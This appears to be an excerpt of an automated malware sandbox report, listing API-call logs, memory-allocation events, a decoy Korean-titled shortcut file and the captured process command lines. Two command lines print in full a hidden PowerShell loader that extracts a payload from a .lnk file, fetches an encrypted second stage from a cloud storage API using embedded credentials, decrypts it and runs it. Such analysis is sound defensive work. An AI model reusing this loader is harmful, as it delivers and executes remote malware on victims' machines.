CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 20, 2024, 5:55 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 312 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b78000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2024, 5:55 p.m.	process_identifier: 2752 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\한중 북중 안보현안 비공개 정책간담회 계획.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

cmdline

powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
